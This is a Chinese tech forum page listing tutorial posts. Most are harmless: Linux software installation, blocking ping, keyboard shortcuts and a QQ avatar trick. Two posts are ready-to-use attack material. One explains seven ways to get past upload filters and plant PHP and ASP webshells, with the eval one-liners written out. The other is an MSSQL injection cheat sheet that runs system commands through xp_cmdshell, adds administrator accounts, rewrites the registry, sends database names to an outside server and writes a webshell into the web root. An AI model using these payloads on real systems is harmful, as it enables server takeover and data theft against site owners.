一个属于你的次元网络基地
 
昨日:篇  今日:篇   总帖:篇   会员:
今日:0    总帖:139
wolfman
3096
Linux程序安装 有图   技术教程
 一、rpm包安装方式步骤:    1、找到相应的软件包,比如soft.version.rpm,下载到本机某个目录;  2、打开一个终端,su -成root用户;  3、cd soft.version.rpm所在的目录;  4、输入rpm -ivh soft.version.rpm    二、deb包安装方式步骤:    1、找到相应的软件包,比如soft.version.deb,下载到本机某个目录;  2、打开一个终端,su -成root用户;  3、cd soft.version.deb所在的目录;  4、输入dpkg -i soft.version.deb    三、tar.gz源代码包安装方式:    1、找到相应的软件包,比如soft.tar.gz,下载到本机某个目录;  2、打开一个终端,su -成root用户;  3、cd soft.tar.gz所在的目录;  4、tar -xzvf soft.tar.gz //一般会生成一个soft目录  5、cd soft  6、./configure  7、make  8、make install    四、tar.bz2源代码包安装方式:  1、找到相应的软件包,比如soft.tar.bz2,下载到本机某个目录;  2、打开一个终端,su -成root用户;  3、cd soft.tar.bz2所在的目录;  4、tar -xjvf soft.tar.bz2 //一般会生成一个soft目录  5、cd soft  6、./configure  7、make  8、make install    五、apt方式安装:    1、打开一个终端,su -成root用户;  2、apt-cache search soft 注:soft是你要找的软件的名称或相关信息  3、如果2中找到了软件soft.version,则用apt-get install soft.version命令安  装软件 注:只要你可以上网,只需要用apt-cache search查找软件,用apt-get  install软件    六、bin文件安装:    如果你下载到的软件名是soft.bin,一般情况下是个可执行文件,安装方法如下:  1、打开一个终端,su -成root用户;  2、chmod +x soft.bin  3、./soft.bin //运行这个命令就可以安装软件了    七、不需要安装的软件:    有了些软件,比如lumaqq,是不需要安装的,自带jre解压缩后可直接运行。假设  下载的是lumaqq.tar.gz,使用方法如下:  1、打开一个终端,su -成root用户;  2、tar -xzvf lumaqq.tar.gz //这一步会生成一个叫LumaQQ的目录  3、cd LumaQQ  4、chmod +x lumaqq //设置lumaqq这个程序文件为可运行  5、此时就可以运行lumaqq了,用命令./lumaqq即可,但每次运行要输入全路径或  切换到刚才生成的LumaQQ目录里  6、为了保证不设置路径就可以用,你可以在/bin目录下建立一个lumaqq的链接,  用命令ln -s lumaqq /bin/ 即可,以后任何时候打开一个终端输入lumaqq就可以  启动QQ聊天软件了  7、 如果你要想lumaqq有个菜单项,使用菜单编辑工具,比如Alacarte Menu  Editor,找到上面生成的LumaQQ目录里的lumaqq设置一个菜单项就可以了,当然你  也可以直接到 /usr/share/applications目录,按照里面其它*.desktop文件的格  式生成一个自己的desktop文件即可。
3 0 2607天前
wolfman
3596
10分钟就能找回自己的QQ号申诉过程(盗别人号的因为ip地址不对会失败):第一步到安全中心申诉扣扣,把知道的填上去。记住,在填经常登陆地点时要写真实的。说白了就是异地申诉没用。再填写结果什么接收,填手机接收就ok,然后写帮助申诉的人时,写自己两个小号。(关键记住回执编号)第二步:用两个小号分别登陆安全中心。帮助你申诉那个要申诉的号。第三步(重点):打电话到075583765566然后按1。(用第一步结果接收的号码打电话)她会提示你输扣扣号,把那个要申诉的扣扣号输进去,然后再会叫你输回执编号,直接输进去。 然后就会提示按1催申,按2取消申诉……反正按1就是了。第四步:腾讯提示催申成功。(果断的挂电话,一分钟多少钱来着?)然后你就会看见来了一条短信 4*******5申诉成功,回执1**********,凭证35*****,请设置新密码【腾讯科技】哇咔咔,呼啦啦!直接到腾讯安全中心设密码就行,然后尽情的笑吧!前后十分钟不到,申诉完成。,注意如果被盗,可以用小号查大号空间好友,添加说明情况,电话号码填自己一个,其它问好友要,或随便填两个,不懂下面评论。
4 0 2608天前
wolfman
2964
有的朋友还不知道QQ透明头像是怎么做的,现在说下工具:①安卓手机一台            ②QQ2012日本版            ③透明头像素材 当然也可以自己制作(不懂可以提问)  素材教程:①安装QQ2012日本版            ②打开,登录自己的QQ            ③登录成功了就点击自己的资料→点击自己头像→然后用你喜欢的透明头像素材更换头像(虽然日本版是日文,但是更换头像这些基本操作还是可以摸索的)            ④更换好了就退出来,打开原来的QQ2015,点击自己资料,刷新一下,就会发现头像变成透明的了!             教程结束。
2 0 2608天前
wolfman
3121
ps全套技术教程 有图 附件   技术教程
费用:3狼豆ps技术教程:ps教程
5 0 2608天前
wolfman
3123
ping是一个通信协议,是ip协议的一部分,tcp/ip 协议的一部分。利用它可以检查网络是否能够连通,用好它可以很好地帮助我们分析判定网络故障。应用格式为:Ping IP地址。但服务启用ping有时候会造成很多麻烦。 因此有时候根据需要(如防止攻击),Linux服务器管理员可限制服务器禁止其它用户Ping。同时又保证Linux服务器又可以Ping其它服务器.下面介绍几种linux服务器下禁止ping的方法:<1>临时的禁ping方法:以下2种方式都是临时有效,重启服务器设置将失效.首先登陆服务器终端以下执行:echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all或者sysctl -w net.ipv4.icmp_echo_ignore_all=1这样就可以禁ping了;如果想恢复ping可以执行以下命令:echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all或者sysctl -w net.ipv4.icmp_echo_ignore_all=0以上修改后,均可以通过查看以下文件来查看设置vi /proc/sys/net/ipv4/icmp_echo_ignore_all 但是,该文件不能直接修改! <2>永久禁ping方法若想永久实现禁ping,可以修改/etc/sysctl.conf文件,如下:vi /etc/sysctl.confnet.ipv4.icmp_echo_ignore_all = 1   //默认设置为0. 以上操作,还是有前提的,若主机本身自带防火墙iptables中INPUT、OUTPUT默认策略为ACCEPT,那么主机默认是允许ping.则可以直接做以上修改,即可起到临时或永久禁ping效果.若iptables中INPUT、OUTPUT默认策略均为DROP时,那么主机本身默认已经禁ping,则无需做以上修改了.同样,若需要开启ping,则需要添加相应的策略.如下:若iptables中INPUT、OUTPUT均为DROP话,则需要添加:iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPTiptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT
6 1 2608天前
sanqing
2719
逼话不多链接:打开
5 1 2609天前
wolfman
3391
全套百度云链接:易语言教程
4 0 2616天前
sanqing
3274
Ctrl+S 保存Ctrl+W 关闭程序Ctrl+N 新建Ctrl+O 打开Ctrl+Z 撤销Ctrl+F 查找Ctrl+X 剪切Ctrl+C 复制Ctrl+V 粘贴Ctrl+A 全选Ctrl+[ 缩小文字  Ctrl+] 放大文字Ctrl+B 粗体Ctrl+I 斜体Ctrl+U 下划线Ctrl+Shift 输入法切换Ctrl+空格 中英文切换Ctrl+回车 QQ号中发送信息Ctrl+Home 光标快速移到文件头Ctrl+End 光标快速移到文件尾Ctrl+Esc 显示开始菜单Ctrl+Shift+< 快速缩小文字Ctrl+Shift+> 快速放大文字Ctrl+F5 在IE中强行刷新Ctrl+拖动文件 复制文件Ctrl+Backspace 启动\关闭输入法拖动文件时按住Ctrl+Shift 创建快捷方式  Alt+空格+C 关闭窗口Alt+空格+N 最小化当前窗口Alt+空格+R 恢复最小化窗口Alt+空格+X 最大化当前窗口
5 0 2616天前
wolfman
3308
一般网站图片上传功能都对文件进行过滤,防止webshell写入。但不同的程序对过滤也不一样,如何突破过滤继续上传?本文总结了七种方法,可以突破!1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php2、使用edjpgcom工具向图片注入代码。(php)//edjpgcom修改,加入php一句话保存为dama.php3、cmd命令下copy 图片.GIF+shell.php webshell.php (php) //估计和1是同样的原理,欺骗上传webshell.php4、C32asm打开图片在文件末尾空一格加入代码<?php eval($_POST[cmd])?> 。(php)//填充php一句话然后上传。5、在4基础上改进代码<?php fputs(fopen(“error.php”.”w”).”<?eval(\$_POST[cmd]);?>”)?> 。(php)//同目录下生成error.php,提问:asp的怎么改写?回答:asp测试的结果是:没有权限…<%Set MyFileObject=Server.CreateObject(“Scripting.FileSystemObject”)Set MyTextFile=MyFileObject.CreateTextFile(“kafei.asp”)MyTextFile.WriteLine(“\<\%eval request(chr(35))\%\>”)MyTextFile.Close%>6、IIS解析目录名漏洞1.php;.jpg (jpg) //这是文件名变量没有过滤。7、nc抓包改数据 //路径名和文件名没有过滤。//通过抓包修改上传路径通过/upload/1.asp+空格,使用软件把空格填充为00。然后nc提交获取webshell。
6 0 2619天前
wolfman
3131
常用的注入命令   技术教程
//看看是什么权限的and 1=(Select IS_MEMBER(db_owner))And char(124)%2BCast(IS_MEMBER(db_owner) as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS(master))And char(124)%2BCast(HAS_DBACCESS(master) as varchar(1))%2Bchar(124)=1 --数字类型and char(124)%2Buser%2Bchar(124)=0字符类型and char(124)%2Buser%2Bchar(124)=0 and =搜索类型and char(124)%2Buser%2Bchar(124)=0 and %=爆用户名and user>0and user>0 and =检测是否为SA权限and 1=(select IS_SRVROLEMEMBER(sysadmin));--And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --检测是不是MSSQL数据库and exists (select * from sysobjects);--检测是否支持多行;declare @d int;--恢复 xp_cmdshell;exec master..dbo.sp_addextendedproc xp_cmdshell,xplog70.dll;--select * from openrowset(sqloledb,server=192.168.1.200,1433;uid=test;pwd=pafpaf,select @@version)//-----------------------// 执行命令//-----------------------首先开启沙盘模式:exec master..xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftJet4.0Engines,SandBoxMode,REG_DWORD,1然后利用jet.oledb执行系统命令select * from openrowset(microsoft.jet.oledb.4.0,;database=c:winntsystem32iasias.mdb,select shell("cmd.exe /c net user admin admin1234 /add"))执行命令;DECLARE @shell INT EXEC SP_OAcreate wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:WINNTsystem32cmd.exe /c net user paf pafpaf /add;--EXEC [master].[dbo].[xp_cmdshell] cmd /c md c:1111判断xp_cmdshell扩展存储过程是否存在:asp?keyno=188">http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_cmdshell)写注册表exec master..xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftJet4.0Engines,SandBoxMode,REG_DWORD,1REG_SZ读注册表exec master..xp_regread HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon,Userinit读取目录内容exec master..xp_dirtree c:winntsystem32,1,1数据库备份backup database pubs to disk = c:123.bak//爆出长度And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--更改sa口令方法:用sql综合利用工具连接后,执行命令:exec sp_password NULL,新密码,sa添加和删除一个SA权限的用户test:exec master.dbo.sp_addlogin test,ptloveexec master.dbo.sp_addsrvrolemember test,sysadmin删除扩展存储过过程xp_cmdshell的语句: exec sp_dropextendedproc xp_cmdshell添加扩展存储过过程EXEC [master]..sp_addextendedproc xp_proxiedadata, c:winntsystem32sqllog.dll GRANT exec On xp_proxiedadata TO public停掉或激活某个服务。exec master..xp_servicecontrol stop,scheduleexec master..xp_servicecontrol start,scheduledbo.xp_subdirs只列某个目录下的子目录。xp_getfiledetails C:InetpubwwwrootSQLInjectlogin.aspdbo.xp_makecab将目标多个档案压缩到某个目标档案之内。所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。dbo.xp_makecabc: est.cab,mszip,1,C:InetpubwwwrootSQLInjectlogin.asp,C:InetpubwwwrootSQLInjectsecurelogin.aspxp_terminate_process停掉某个执行中的程序,但赋予的参数是 Process ID。利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process IDxp_terminate_process 2484xp_unpackcab解开压缩档。xp_unpackcab c: est.cab,c: emp,1某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite HKEY_LOCAL_MACHINE,SYSTEMRAdminv2.0ServerParameters,Parameter,REG_BINARY,0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite HKEY_LOCAL_MACHINE,SYSTEMRAdminv2.0ServerParameters,port,REG_BINARY,0xd20400 则端口值改为1234create database lcx;Create TABLE ku(name nvarchar(256) null);Create TABLE biao(id int NULL,name nvarchar(256) null);//得到数据库名insert into opendatasource(sqloledb,server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx).lcx.dbo.ku select name from master.dbo.sysdatabases//在Master中创建表,看看权限怎样Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--用 sp_makewebtask直接在web目录里写入一句话马:%20">https://127.0.0.1/dblogin123.asp?username=123;exec%20sp_makewebtask%20d:www t88.asp,%20select%20<%25execute(request("a"))%25>%20;--//更新表内容Update films SET kind = Dramatic Where id = 123//删除内容delete from table_name where Stockid = 3
6 0 2619天前
快速发帖 高级模式
加入官群 QQ咨询 友链展示 申请友链
粤ICP备18094291号
您的IP:3.147.104.18,2024-11-21 20:07:00,Processed in 0.20308 second(s).
免责声明: 本网不承担任何由内容提供商提供的信息所引起的争议和法律责任。
Powered by HadSky 8.1.0